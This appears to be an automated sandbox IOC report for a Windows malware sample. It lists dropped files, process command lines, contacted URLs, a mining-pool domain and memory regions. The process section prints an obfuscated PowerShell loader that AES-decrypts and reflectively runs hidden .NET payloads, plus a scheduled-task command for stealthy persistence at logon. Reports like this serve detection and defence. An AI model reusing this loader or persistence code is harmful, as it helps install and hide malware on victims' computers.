IOC Report
file.exe

loading gif

Files

File Path
Type
Category
Malicious
file.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Roaming\Network64476Man.cmd
DOS batch file, ASCII text, with very long lines (65224), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0eypjr0t.xpe.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1toodinm.31x.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1w0hlilp.fbk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5j1slznj.oxi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a2ne3d0t.pwv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3j0lpfm.a3u.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cw1jtyfo.le4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d3qikalu.fif.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehsgaygn.agj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i2xgbr1m.juu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i50xp5d4.d1l.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iaxuahdl.j1u.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ignfmwbq.g1u.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iv3lhqsw.erv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jh2yufyq.32r.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kr5pungr.4m2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbmfwsca.vrw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ly44mqxq.0o2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mb43ixh4.zks.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pw0ulnel.anq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qddsyunx.5jp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r1qdtpxo.apj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wdu011nm.cvz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ynferzkp.qyn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\Desktop\mhk.cmd
DOS batch file, ASCII text, with very long lines (65224), with CRLF line terminators
dropped
\Device\ConDrv
ASCII text, with very long lines (2170), with CRLF line terminators
dropped
There are 21 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\file.exe
"C:\Users\user\Desktop\file.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\mhk.cmd" "
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\mhk.cmd"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\mhk.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\mhk')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
malicious
C:\Windows\System32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network64476Man.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network64476Man')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 15 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://www.microsoft.co0
unknown
https://go.micro
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
http://www.microsoft.coQ
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://oneget.orgX
unknown
https://aka.ms/winsvr-2022-pshelpX
unknown
http://www.microsoft.
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://aka..winsvr
unknown
https://github.com/Pester/Pester
unknown
https://oneget.org
unknown
http://crl.microsoftr
unknown
There are 14 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
pool.hashvault.pro
142.202.242.43

Memdumps

Base Address
Regiontype
Protect
Malicious
1DF26ECF000
trusted library allocation
page read and write
7FFD9BA81000
trusted library allocation
page read and write
2151DBF0000
heap
page read and write
1DF2F067000
heap
page read and write
217EC7D0000
heap
page read and write
7FFD9BB00000
trusted library allocation
page read and write
1EBD2D40000
trusted library allocation
page read and write
240B2F75000
heap
page read and write
1DF172FF000
trusted library allocation
page read and write
24098C17000
heap
page read and write
7FFD9BC10000
trusted library allocation
page read and write
217EC870000
heap
page execute and read and write
7FFD9B8C4000
trusted library allocation
page read and write
1DF17BF6000
trusted library allocation
page read and write
1ACBFDC7000
heap
page read and write
21538038000
heap
page read and write
7FFD9BC70000
trusted library allocation
page read and write
2409C6F5000
trusted library allocation
page read and write
1ACC3D0B000
heap
page read and write
7FFD9BC30000
trusted library allocation
page read and write
21537E61000
heap
page read and write
7FFD9BD40000
trusted library allocation
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
7FFD9BC80000
trusted library allocation
page read and write
1ACC4552000
heap
page read and write
1ACBFD30000
heap
page read and write
14F75BC0000
heap
page read and write
1ACBFC20000
heap
page read and write
1ACBFC90000
heap
page read and write
13D004D5000
trusted library allocation
page read and write
1ACC3BE0000
heap
page read and write
2C7C50A000
stack
page read and write
2409A550000
trusted library allocation
page read and write
1ACBFD79000
heap
page read and write
1EBBB5D2000
trusted library allocation
page read and write
7FFD9BC70000
trusted library allocation
page read and write
1ACBFD79000
heap
page read and write
7FFD9BD00000
trusted library allocation
page execute and read and write
1EBBBE8E000
trusted library allocation
page read and write
8813DFE000
stack
page read and write
1ACBFDD8000
heap
page read and write
7FFD9B91D000
trusted library allocation
page execute and read and write
7FFD9BCA0000
trusted library allocation
page read and write
14F75C96000
heap
page read and write
1ACBFD3A000
heap
page read and write
7FFD9BA10000
trusted library allocation
page execute and read and write
1EBD2FC1000
heap
page read and write
1ACC1C3E000
heap
page read and write
1DF16FB6000
trusted library allocation
page read and write
217EA76C000
heap
page read and write
7FFD9BB20000
trusted library allocation
page read and write
FAA3AF8000
stack
page read and write
21790092000
trusted library allocation
page read and write
7FFD9BC19000
trusted library allocation
page read and write
7FFD9BA7A000
trusted library allocation
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page execute and read and write
7FF65A3B4000
unkown
page read and write
24098BD0000
heap
page read and write
13D01B64000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
21521375000
trusted library allocation
page read and write
2409B711000
trusted library allocation
page read and write
1EBB8C57000
heap
page read and write
2C7B3F9000
stack
page read and write
24098D95000
heap
page read and write
13D00420000
trusted library allocation
page read and write
7FFD9BABA000
trusted library allocation
page read and write
2CDC2FC000
stack
page read and write
1ACBFDD8000
heap
page read and write
2CDC3FF000
unkown
page read and write
7FFD9BC42000
trusted library allocation
page read and write
FAA3D7C000
stack
page read and write
40BBAFE000
stack
page read and write
1EBD3346000
heap
page read and write
7FFD9B9A6000
trusted library allocation
page read and write
240B356C000
heap
page read and write
8813C7E000
stack
page read and write
D6A4BFE000
stack
page read and write
1EBBBF05000
trusted library allocation
page read and write
7FFD9BAD2000
trusted library allocation
page read and write
24098CD0000
heap
page read and write
2152F9FD000
trusted library allocation
page read and write
1DF16E30000
heap
page execute and read and write
1EBB8C3B000
heap
page read and write
240AA8C1000
trusted library allocation
page read and write
14F75E80000
heap
page read and write
7FFD9BB70000
trusted library allocation
page read and write
1EBD3250000
heap
page read and write
1EBBA790000
heap
page execute and read and write
7FFD9BA71000
trusted library allocation
page read and write
217EC180000
trusted library allocation
page read and write
8649EF7000
stack
page read and write
2151DE60000
trusted library allocation
page read and write
1DF2F08F000
heap
page read and write
7FFD9BC64000
trusted library allocation
page read and write
7FFD9BD20000
trusted library allocation
page read and write
7FFD9BC2C000
trusted library allocation
page read and write
217EC74D000
heap
page read and write
21520C20000
trusted library allocation
page read and write
240B3330000
heap
page read and write
1ACC4592000
heap
page read and write
13D187F8000
heap
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page read and write
2409C42D000
trusted library allocation
page read and write
21790082000
trusted library allocation
page read and write
1EBB8A50000
heap
page read and write
2C7B739000
stack
page read and write
7FFD9B904000
trusted library allocation
page read and write
240B2E01000
heap
page read and write
13D7E5E6000
heap
page read and write
13D01D6A000
trusted library allocation
page read and write
2409A945000
trusted library allocation
page read and write
217EC98F000
heap
page read and write
2409B9BA000
trusted library allocation
page read and write
240B2F2E000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
7FFD9B99C000
trusted library allocation
page execute and read and write
7FFD9BA91000
trusted library allocation
page read and write
217EC2E0000
heap
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
7FFD9BC80000
trusted library allocation
page read and write
1EBBB379000
trusted library allocation
page read and write
2153803A000
heap
page read and write
7FFD9BD40000
trusted library allocation
page read and write
2409A8B0000
heap
page execute and read and write
217EA74D000
heap
page read and write
7FFD9BC38000
trusted library allocation
page read and write
13D189CC000
heap
page read and write
240B2EE9000
heap
page read and write
1DF26E51000
trusted library allocation
page read and write
2151DC70000
trusted library section
page read and write
2C7B6B9000
stack
page read and write
217EA6C0000
heap
page read and write
7FFD9BAE0000
trusted library allocation
page execute and read and write
2151F7C0000
trusted library allocation
page read and write
7FFD9BB60000
trusted library allocation
page read and write
13D7E570000
heap
page read and write
D6A4FB8000
stack
page read and write
1ACBFD12000
heap
page read and write
1EBBBDF1000
trusted library allocation
page read and write
2C7B47E000
stack
page read and write
7FFD9BC80000
trusted library allocation
page read and write
1EBD2ED7000
heap
page read and write
FAA484D000
stack
page read and write
7FF65A3AB000
unkown
page read and write
21520FB0000
trusted library allocation
page read and write
1DF26EC3000
trusted library allocation
page read and write
240B2F24000
heap
page read and write
7FFD9BB80000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
240B2CD2000
heap
page read and write
7FFD9BA00000
trusted library allocation
page execute and read and write
1EBBB94D000
trusted library allocation
page read and write
1ACC4510000
heap
page read and write
1ACC45D6000
heap
page read and write
1ACBFDC7000
heap
page read and write
217EA960000
trusted library allocation
page read and write
1DF2EE84000
heap
page read and write
7FFD9BD60000
trusted library allocation
page read and write
7FFD9BC43000
trusted library allocation
page read and write
7FFD9BC50000
trusted library allocation
page read and write
7FFD9BC23000
trusted library allocation
page read and write
7FFD9BB60000
trusted library allocation
page read and write
FAA377A000
stack
page read and write
7FFD9BAA2000
trusted library allocation
page read and write
1ACC33E3000
heap
page read and write
21781C1F000
trusted library allocation
page read and write
240B2FC1000
heap
page read and write
D6A4F39000
stack
page read and write
1DF2EE5B000
heap
page read and write
D6A4AFE000
unkown
page read and write
7FFD9B9BC000
trusted library allocation
page execute and read and write
13D003B0000
heap
page execute and read and write
217EA769000
heap
page read and write
7FFD9B90B000
trusted library allocation
page read and write
1DF14E47000
heap
page read and write
2151F7F0000
trusted library allocation
page read and write
7FFD9BC10000
trusted library allocation
page read and write
13D00230000
heap
page read and write
7FFD9BC20000
trusted library allocation
page read and write
21537E2E000
heap
page read and write
13D00040000
trusted library allocation
page read and write
7FFD9B8E0000
trusted library allocation
page read and write
FAA387A000
stack
page read and write
7FFD9BAE2000
trusted library allocation
page read and write
1DF16FBD000
trusted library allocation
page read and write
B1C85B9000
stack
page read and write
21521411000
trusted library allocation
page read and write
240B2EA9000
heap
page read and write
1EBCA7C1000
trusted library allocation
page read and write
7FFD9BC00000
trusted library allocation
page read and write
2409B9DB000
trusted library allocation
page read and write
1ACC4511000
heap
page read and write
2152104D000
trusted library allocation
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
21538124000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page execute and read and write
13D01B5D000
trusted library allocation
page read and write
21520E4D000
trusted library allocation
page read and write
D6A513F000
stack
page read and write
13D01048000
trusted library allocation
page read and write
21537979000
heap
page read and write
21538046000
heap
page read and write
7FFD9BBF3000
trusted library allocation
page read and write
1DF14FA0000
heap
page read and write
7FFD9BC40000
trusted library allocation
page read and write
13D00430000
heap
page execute and read and write
217EA975000
heap
page read and write
2151F9EA000
trusted library allocation
page read and write
1DF14EE0000
trusted library allocation
page read and write
7FFD9BAE7000
trusted library allocation
page read and write
8813FF8000
stack
page read and write
1ACBFDC2000
heap
page read and write
13D00020000
trusted library allocation
page read and write
2C7B37F000
stack
page read and write
1EBB8DD0000
heap
page read and write
13D1898D000
heap
page read and write
7FFD9B9AC000
trusted library allocation
page execute and read and write
1ACBFD79000
heap
page read and write
240AABB5000
trusted library allocation
page read and write
14F75F40000
heap
page read and write
7FFD9B8FD000
trusted library allocation
page execute and read and write
14F75BB0000
heap
page read and write
2409BB06000
trusted library allocation
page read and write
7FFD9BD10000
trusted library allocation
page read and write
7FFD9B986000
trusted library allocation
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
864A2BF000
stack
page read and write
1ACBFD3F000
heap
page read and write
1EBD2F8B000
heap
page read and write
13D01A8A000
trusted library allocation
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
2409BA88000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
7FFD9BB50000
trusted library allocation
page read and write
1DF14DA0000
heap
page read and write
7FFD9BB70000
trusted library allocation
page read and write
13D18D0D000
heap
page read and write
240B2EEF000
heap
page read and write
1EBBBEC5000
trusted library allocation
page read and write
1EBBC2A5000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page execute and read and write
B1C928E000
stack
page read and write
7DF4DC950000
trusted library allocation
page execute and read and write
217EC637000
heap
page read and write
1DF2EFE0000
heap
page read and write
240B2EC2000
heap
page read and write
217EC120000
heap
page execute and read and write
1ACC46D3000
heap
page read and write
21538119000
heap
page read and write
8649F3F000
stack
page read and write
24098D80000
trusted library allocation
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
240B2F69000
heap
page read and write
B1C88BB000
stack
page read and write
13D004C6000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
2409A5E0000
heap
page read and write
13D01F78000
trusted library allocation
page read and write
2409A8C1000
trusted library allocation
page read and write
7FFD9BC10000
trusted library allocation
page read and write
217EC867000
heap
page execute and read and write
13D18D08000
heap
page read and write
7FFD9B8E0000
trusted library allocation
page read and write
217EA757000
heap
page read and write
7FFD9B8CD000
trusted library allocation
page execute and read and write
1ACC33E0000
trusted library allocation
page read and write
7FFD9BBE8000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page execute and read and write
7FFD9BD20000
trusted library allocation
page read and write
13D01EC0000
trusted library allocation
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
7FFD9BD30000
trusted library allocation
page execute and read and write
7FFD9BD65000
trusted library allocation
page read and write
13D7FE60000
heap
page read and write
21537DC0000
heap
page read and write
13D7E5E8000
heap
page read and write
1DF2EEB5000
heap
page read and write
1DF1684A000
heap
page read and write
FAA38FD000
stack
page read and write
217EA970000
heap
page read and write
7FFD9B904000
trusted library allocation
page read and write
14F75F43000
heap
page read and write
1ACBFD45000
heap
page read and write
1EBB8C82000
heap
page read and write
7FFD9B9B6000
trusted library allocation
page execute and read and write
1ACBFD6C000
heap
page read and write
7FFD9B97C000
trusted library allocation
page execute and read and write
2152FAEE000
trusted library allocation
page read and write
21781BC4000
trusted library allocation
page read and write
21520DE4000
trusted library allocation
page read and write
1ACC1C10000
heap
page read and write
1ACBFCC4000
heap
page read and write
13D18804000
heap
page read and write
8814E49000
stack
page read and write
7FFD9BC30000
trusted library allocation
page read and write
240B2FEE000
heap
page read and write
1EBD3313000
heap
page read and write
7FFD9BC40000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
7FFD9BD52000
trusted library allocation
page read and write
1EBBBF2F000
trusted library allocation
page read and write
13D001E0000
trusted library allocation
page read and write
1EBD2F22000
heap
page read and write
13D002B6000
heap
page read and write
7FFD9B910000
trusted library allocation
page read and write
1DF14FA8000
heap
page read and write
2CDC4FF000
stack
page read and write
13D7E5F0000
heap
page read and write
13D18942000
heap
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page execute and read and write
B1C7F6E000
unkown
page read and write
13D18910000
heap
page read and write
1EBB8BD0000
trusted library allocation
page read and write
240B2E8F000
heap
page read and write
2409C468000
trusted library allocation
page read and write
2C7B83E000
stack
page read and write
1EBD2FB5000
heap
page read and write
7FFD9BC30000
trusted library allocation
page read and write
13D104C3000
trusted library allocation
page read and write
7FFD9BC22000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
14F75F4D000
heap
page read and write
1DF14F70000
heap
page execute and read and write
2151F900000
trusted library allocation
page read and write
13D00290000
heap
page read and write
2153849D000
heap
page read and write
7FFD9BD90000
trusted library allocation
page read and write
2409AAEA000
trusted library allocation
page read and write
2153809F000
heap
page read and write
7FFD9BB50000
trusted library allocation
page read and write
240AA8F1000
trusted library allocation
page read and write
7FFD9B8ED000
trusted library allocation
page execute and read and write
21790076000
trusted library allocation
page read and write
215207CC000
trusted library allocation
page read and write
217801BE000
trusted library allocation
page read and write
217EA796000
heap
page read and write
240B2FB2000
heap
page read and write
21538310000
heap
page read and write
8814D4C000
stack
page read and write
7FFD9BB50000
trusted library allocation
page read and write
1EBBB835000
trusted library allocation
page read and write
1EBBBF00000
trusted library allocation
page read and write
217EC93C000
heap
page read and write
1ACC3D0D000
heap
page read and write
21537E1D000
heap
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
7FFD9BC40000
trusted library allocation
page read and write
7FFD9BBB9000
trusted library allocation
page read and write
1EBBBE5A000
trusted library allocation
page read and write
1DF26E60000
trusted library allocation
page read and write
D6A4CFE000
stack
page read and write
13D18960000
heap
page read and write
7FFD9BD00000
trusted library allocation
page read and write
1ACBFD52000
heap
page read and write
2151DC50000
heap
page read and write
1DF16845000
heap
page read and write
1EBD2EE3000
heap
page read and write
1EBBB778000
trusted library allocation
page read and write
FAA3333000
stack
page read and write
1EBD27CB000
heap
page read and write
217EC2E8000
heap
page read and write
2C7B4FB000
stack
page read and write
240B2C5D000
heap
page read and write
13D104C9000
trusted library allocation
page read and write
2409B6B1000
trusted library allocation
page read and write
7FFD9B8E0000
trusted library allocation
page read and write
1EBCA868000
trusted library allocation
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
FAA33BD000
unkown
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
1DF14F00000
trusted library allocation
page read and write
13D000D2000
heap
page read and write
7FFD9BBD5000
trusted library allocation
page read and write
864A0B9000
stack
page read and write
8813F78000
stack
page read and write
7FFD9B9A6000
trusted library allocation
page read and write
1DF16E37000
heap
page execute and read and write
7FFD9BB20000
trusted library allocation
page read and write
2409A540000
heap
page readonly
7FFD9BBE0000
trusted library allocation
page read and write
13D01E2C000
trusted library allocation
page read and write
7DF4DC960000
trusted library allocation
page execute and read and write
1DF14E27000
heap
page read and write
7FFD9BB70000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page execute and read and write
2151DCF5000
heap
page read and write
7FFD9BC48000
trusted library allocation
page read and write
